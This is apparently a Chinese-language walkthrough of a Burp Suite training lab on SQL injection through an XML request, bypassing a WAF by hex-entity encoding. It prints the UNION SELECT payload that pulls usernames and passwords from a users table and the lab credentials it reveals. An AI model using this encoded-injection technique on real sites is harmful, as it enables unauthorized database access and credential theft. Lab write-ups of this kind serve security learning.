bp官方靶场sql注入18

第十八关 通过 XML 编码绕过过滤器的 SQL 注入

这一关就是绕过xml网站设置的WAF，插入sql注入实现暴露出账户名和密码

提示：1、是xml格式的网站，存在sql注入漏洞，

2、可以使用UNION 攻击从其他表中检索数据

3、有个users表

具体操作：

1、点击触发下功能点

2、找到触发的数据包发往repeater

3、先看下原本的数据

4、加个计算看下，发生变化，确定存在注入：

插入

1+1

5、插入sql语句，检测sql注入漏洞存在

1 UNION SELECT NULL

页面显示检测到攻击，说明网站设置了WAF

6、再用单引号尝试

页面显示也检测到了攻击

7、怎么Bypass 绕过 WAF 呢？

使用Hackvertor 插件编码

进行编码

<@hex_entities>1 UNION SELECT username || '~' || password FROM users</@hex_entities>
​

插入编码后sql语句，成功暴露出信息

wiener~k0otzc0xlrh60fulyju3
carlos~pulgeyrxft7imsh31q3t
administrator~efsf9d9syad3xdoal5wo

8、如图进行登录，靶场过关

扩展